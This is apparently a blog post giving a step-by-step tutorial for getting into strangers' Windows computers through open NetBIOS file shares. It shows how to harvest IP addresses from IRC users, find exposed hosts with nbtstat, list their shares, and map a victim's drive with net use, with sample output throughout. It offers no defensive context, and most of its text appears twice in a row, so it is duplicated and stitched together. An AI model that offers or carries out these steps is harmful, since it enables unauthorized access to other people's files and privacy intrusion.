A - How The Hack Works
Netbios is a tcp/ip protocol [this means that it runs over the internet] it is used to share files and printers, the port that netbios runs under is 139, it is easy to hack because windows has installed programes to exploit this vulnrability, although there arn't as many people open to this attack as in the past, there are still a few
B - Getting Started
First of all you need netbios enabled in on your box to do this in xp goto your dial-up connection properties and and click on tcp/ip properties click the advanced tab then wins and enable it down the bottom, restart mind this is for xp only, it should be enabled automaticly on any other version, next find a target the best way to do this is to get mirc this is a good irc client for winblowz get this up and running and use the /dns <username> to get an ip address, then open up command prompt or ms-dos and type nbtstat -A ip address hit enter and wait you should get 1 of 2 screens :
1 - host not found, [or something like that]
2 - C:\>nbtstat -A 192.168.0.99
Local Area Connection :
Node ip_address: [192.168.0.99] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
SLASHER <00> GROUP Registered
SERVER <03> UNIQUE Registered
SERVER <20> UNIQUE Registered
SLASHER <1E> GROUP Registered
SLASHER <1D> UNIQUE Registered
MSBROWSE <01> GROUP Registered
SERVER <01> UNIQUE Registered
MAC Address = 00-02-E3-05-AE-ED
Well this tells all see the <20> hex this is what we are looking for this lets us know that this box is open and hackable, there are a few exection's to this rule but 90% of the time this is the case, if you cant find a host the first time just keep trying there are lots of open comps out there, now that we have found a open host lets start hacking, to view the hosts shares [thats what we are hacking] type Net view \\ip address, you should get a list something like this
C:\>net view \\192.168.0.99
Shared resources at \\192.168.0.99
850
Share name Type Used as Comment
--------------------------------------
C:\ Disk
cd-rom Disk
GAMES (D) Disk
Printer Print HP DeskJet 692C
SharedDocs Disk
So now that you have found out the name of the shares time to start looking inside them, there are two ways to do this :
1 - Type the ip into your browser [internet explorer] like so \\ip address
2 - Type net use x: \\ipaddress\sharename [example: net use c: \\123.123.123.123\c]
The second command is good because you can view the shares in dos thus speeding up the load time, what is does is maps the c drive of the remote host to a local drive in this case x: to you computer, so just type x: in to your shell [command prompt, ms-dos] and browse just like it was your c drive
Netbios is a tcp/ip protocol [this means that it runs over the internet] it is used to share files and printers, the port that netbios runs under is 139, it is easy to hack because windows has installed programes to exploit this vulnrability, although there arn't as many people open to this attack as in the past, there are still a few
B - Getting Started
First of all you need netbios enabled in on your box to do this in xp goto your dial-up connection properties and and click on tcp/ip properties click the advanced tab then wins and enable it down the bottom, restart mind this is for xp only, it should be enabled automaticly on any other version, next find a target the best way to do this is to get mirc this is a good irc client for winblowz get this up and running and use the /dns <username> to get an ip address, then open up command prompt or ms-dos and type nbtstat -A ip address hit enter and wait you should get 1 of 2 screens :
1 - host not found, [or something like that]
2 - C:\>nbtstat -A 192.168.0.99
Local Area Connection :
Node ip_address: [192.168.0.99] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
SLASHER <00> GROUP Registered
SERVER <03> UNIQUE Registered
SERVER <20> UNIQUE Registered
SLASHER <1E> GROUP Registered
SLASHER <1D> UNIQUE Registered
MSBROWSE <01> GROUP Registered
SERVER <01> UNIQUE Registered
MAC Address = 00-02-E3-05-AE-ED
Well this tells all see the <20> hex this is what we are looking for this lets us know that this box is open and hackable, there are a few exection's to this rule but 90% of the time this is the case, if you cant find a host the first time just keep trying there are lots of open comps out there, now that we have found a open host lets start hacking, to view the hosts shares [thats what we are hacking] type Net view \\ip address, you should get a list something like this
C:\>net view \\192.168.0.99
Shared resources at \\192.168.0.99
850
Share name Type Used as Comment
--------------------------------------
C:\ Disk
cd-rom Disk
GAMES (D) Disk
Printer Print HP DeskJet 692C
SharedDocs Disk
So now that you have found out the name of the shares time to start looking inside them, there are two ways to do this :
1 - Type the ip into your browser [internet explorer] like so \\ip address
2 - Type net use x: \\ipaddress\sharename [example: net use c: \\123.123.123.123\c]
The second command is good because you can view the shares in dos thus speeding up the load time, what is does is maps the c drive of the remote host to a local drive in this case x: to you computer, so just type x: in to your shell [command prompt, ms-dos] and browse just like it was your c drive
0 Comments:
Post a Comment